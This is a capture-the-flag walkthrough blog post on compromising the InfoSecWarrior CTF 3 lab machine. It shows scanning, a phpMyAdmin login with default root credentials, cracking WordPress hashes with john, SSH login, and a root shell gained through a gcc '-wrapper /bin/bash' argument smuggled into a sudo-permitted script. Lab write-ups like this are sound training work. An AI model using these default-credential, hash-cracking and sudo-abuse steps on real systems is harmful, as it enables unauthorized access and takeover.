InfoSecWarrior CTF: 3 Walkthrough

Armour Infosec — Thu, 09 Apr 2020 18:25:45 +0000

Here is the new challenge of InfoSecWarrior CTF: 3 Walkthrough by Infosec Warrior CTF 2020. The box is designed by Vishal Biswas aka CyberKnight. The goal is to gain the highest privileges and collect only 2 flags (user flag and root flag). According to author box consist WordPress developer configured the machine to work internally. But due to some miss-configuration WordPress is exposed to the outside world. Use your skills and get the root flag. So let us go.

Pentester Methodology

Network Scanning

Netdiscover
Nmap

Enumeration

Nikto
phpMyAdmin
John
SSH

Privilege Escalation

Sudo -l
gcc compilation

Network Scanning

We start with Netdiscover to obtain IP address as followed

#netdiscover -i vboxnet0
	 Currently scanning: 192.168.12.0/16   |   Screen View: Unique Hosts                                                                                                                            
                                                                                                                                                                                                
 2 Captured ARP Req/Rep packets, from 2 hosts.   Total size: 102                                                                                                                                
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.2.2     08:00:27:a0:51:d5      1      42  PCS Systemtechnik GmbH                                                                                                                       
 192.168.2.17    08:00:27:a7:26:e1      1      60  PCS Systemtechnik GmbH

Got the machine Ip 192.168.2.17 and let us scan the Nmap.

#nmap -p- -A -O 192.168.2.17
Starting Nmap 7.80 ( https://nmap.org/ ) at 2020-04-09 18:53 IST
Nmap scan report for 192.168.2.17
Host is up (0.00048s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 d8:ad:48:16:27:f8:cc:99:3a:2f:db:c1:a9:d5:3a:d1 (RSA)
|   256 51:06:ab:78:61:f5:4c:03:a0:8f:01:27:f9:17:51:e7 (ECDSA)
|_  256 d5:63:58:ba:2a:d5:d2:17:cb:63:12:34:d6:cd:b6:b9 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-generator: WordPress 5.3.2
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: TEST WORDPRESS – Just another WordPress site
MAC Address: 08:00:27:A7:26:E1 (Oracle VirtualBox virtual NIC)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=4/9%OT=22%CT=1%CU=44313%PV=Y%DS=1%DC=D%G=Y%M=080027%TM
OS:=5E8F21EA%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=10B%TI=Z%CI=Z%II=I%
OS:TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5
OS:=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=
OS:FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%
OS:A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0
OS:%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S
OS:=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R
OS:=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N
OS:%T=40%CD=S)

Enumeration

On visiting the web page there, we see a WordPress web site. But the WordPress website doesn’t work properly error here so we moved on our next step.

So I fired Nikto and found phpMyAdmin page.

#nikto -h http://192.168.2.17/
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.2.17
+ Target Hostname: 192.168.2.17
+ Target Port: 80
+ Start Time: 2020-04-09 18:55:13 (GMT5.5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'link' found, with contents: ; rel="https://api.w.org/"
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site differently to the MIME type
+ Uncommon header 'x-redirect-by' found, with contents: WordPress
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ Uncommon header 'x-ob_mode' found, with contents: 1
+ Cookie goto created without the httponly flag
+ Cookie back created without the httponly flag
+ OSVDB-3092: /phpMyAdmin/ChangeLog: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /wp-content/plugins/akismet/readme.txt: The WordPress Akismet plugin 'Tested up to' version usually matches the WordPress version
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ /: A WordPress installation was found.
+ /phpmyadmin/: phpMyAdmin directory found
+ Cookie wordpress_test_cookie created without the httponly flag
+ /wp-login.php: WordPress login found
+ OSVDB-3092: /phpMyAdmin/README: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ 7916 requests: 0 error(s) and 20 item(s) reported on remote host
+ End Time: 2020-04-09 18:56:16 (GMT5.5) (63 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

so I logged in with credentials root: root. it was a success

We successfully login with the root MySQL database then I select the wpdb database on open the wp-user table and we see two user entries Krishna and user1 as shown in the image file.

I copy the users hash and save a text file and crack the hash using the john tool use the following command

john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (phpass [phpass ($P$ or $H$) 256/256 AVX2 8x3])
Cost 1 (iteration count) is 8192 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:04 0.13% (ETA: 20:05:08) 0g/s 5444p/s 5444c/s 5444C/s sharpie1..alvina
0g 0:00:00:45 1.36% (ETA: 20:08:02) 0g/s 5109p/s 5109c/s 5109C/s 12062525..109109109
infosec					(?)
Session aborted

john --wordlist=/usr/share/wordlists/rockyou.txt user
Using default input encoding: UTF-8
Loaded 1 password hash (phpass [phpass ($P$ or $H$) 256/256 AVX2 8x3])
Cost 1 (iteration count) is 8192 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:04 0.13% (ETA: 20:05:08) 0g/s 5444p/s 5444c/s 5444C/s sharpie1..alvina
0g 0:00:00:45 23.36% (ETA: 20:08:02) 0g/s 5109p/s 5109c/s 5109C/s 12062525..109109109
user1					(?)
Session aborted

And we see WordPress hashes is cracked successfully and I try to login ssh using the WordPress credentials and us successful login with ssh Krishna shell. Krishna: infosec

#ssh krishna@192.168.2.17
The authenticity of host '192.168.2.17 (192.168.2.17)' can't be established.
ECDSA key fingerprint is SHA256:L8AFuzt5MRe4jDRpDukvoY4rrvpBMl49RbM0tbVdeVM.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.2.17' (ECDSA) to the list of known hosts.
krishna@192.168.2.17's password: 
krishna@ck05:~$ id 
uid=1001(krishna) gid=1001(krishna) groups=1001(krishna)
krishna@ck05:~$ hostname
ck05
krishna@ck05:~$ whoami 
krishna

Got the Shell

Privilege Escalation

I ran the sudo -l command and I found Krishna has sudo permission to run a bash script as loopspell this script is compiler a #C language file using gcc using this command we privilege escalate this machine.

krishna@ck05:~$ sudo -l
Matching Defaults entries for krishna on ck05:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User krishna may run the following commands on ck05:
    (loopspell : ALL) NOPASSWD: /home/loopspell/code_compiler.sh
krishna@ck05:~$ sudo -u loopspell /home/loopspell/code_compiler.sh "-wrapper /bin/bash,-s ."
Code is being compiling ...
loopspell@ck05:~$ id 
uid=1002(loopspell) gid=1002(loopspell) groups=1002(loopspell)
loopspell@ck05:~$ hostname
ck05
loopspell@ck05:~$ whoami 
loopspell

The sudo -l command and we see sudoers filer entry /usr/bin/gcc and code_compiler.sh. using sudo I again run the privilege escalation command and we have a root shell target machine

loopspell@ck05:/home$ cd loopspell/
loopspell@ck05:/home/loopspell$ ls 
backup.c  backup.txt  code_compiler.sh	user.txt
loopspell@ck05:/home/loopspell$ cat user.txt 
a4e3fea7510e570f6964899eb764abdc
loopspell@ck05:/home/loopspell$ sudo -l
Matching Defaults entries for loopspell on ck05:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User loopspell may run the following commands on ck05:
    (ALL : ALL) /usr/bin/gcc
    (ALL : ALL) NOPASSWD: /home/loopspell/code_compiler.sh
loopspell@ck05:/home/loopspell$ sudo -l
Matching Defaults entries for loopspell on ck05:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User loopspell may run the following commands on ck05:
    (ALL : ALL) /usr/bin/gcc
    (ALL : ALL) NOPASSWD: /home/loopspell/code_compiler.sh
loopspell@ck05:/home/loopspell$ sudo /home/loopspell/code_compiler.sh 
Code is being compiling ...
gcc: fatal error: no input files
compilation terminated.
You can find your compiled code in /tmp/ directory.
loopspell@ck05:/home/loopspell$ sudo /home/loopspell/code_compiler.sh "-wrapper /bin/bash,-s ."
Code is being compiling ...
root@ck05:/home/loopspell# id 
uid=0(root) gid=0(root) groups=0(root)
root@ck05:/home/loopspell# hostname
ck05
root@ck05:/home/loopspell# whoami
root
root@ck05:/home/loopspell# passwd
Enter new UNIX password: 
Retype new UNIX password: 
passwd: password updated successfully
root@ck05:/home/loopspell# cd 
root@ck05:~# ls
msg.txt
root@ck05:~# cd /root/
root@ck05:/root# ls
root.txt
root@ck05:/root# cat root
cat: root: No such file or directory
root@ck05:/root# cat root.txt 
_________        ___.                 ____  __.      .__       .__     __    _______   .________
\_   ___ \___.__.\_ |__   ___________|    |/ _| ____ |__| ____ |  |___/  |_  \   _  \  |   ____/
/    \  \<   |  | | __ \_/ __ \_  __ \      <  /    \|  |/ ___\|  |  \   __\ /  /_\  \ |____  \ 
\     \___\___  | | \_\ \  ___/|  | \/    |  \|   |  \  / /_/  >   Y  \  |   \  \_/   \/       \
 \______  / ____| |___  /\___  >__|  |____|__ \___|  /__\___  /|___|  /__|    \_____  /______  /
        \/\/          \/     \/              \/    \/  /_____/      \/              \/       \/ 


flag = efa4c284b8e2a15674dfb369384c8bcf

This flag is a proof that you get the root shell.

Tag me on Twitter with @CyberKnight00 
root@ck05:/root#

Eureka !!!! got root.

The post InfoSecWarrior CTF: 3 Walkthrough appeared first on Armour Infosec.

armour infosec Archives - Armour Infosec

InfoSecWarrior CTF: 3 Walkthrough

Pentester Methodology

Network Scanning

Enumeration

Privilege Escalation

Network Scanning

Enumeration

Privilege Escalation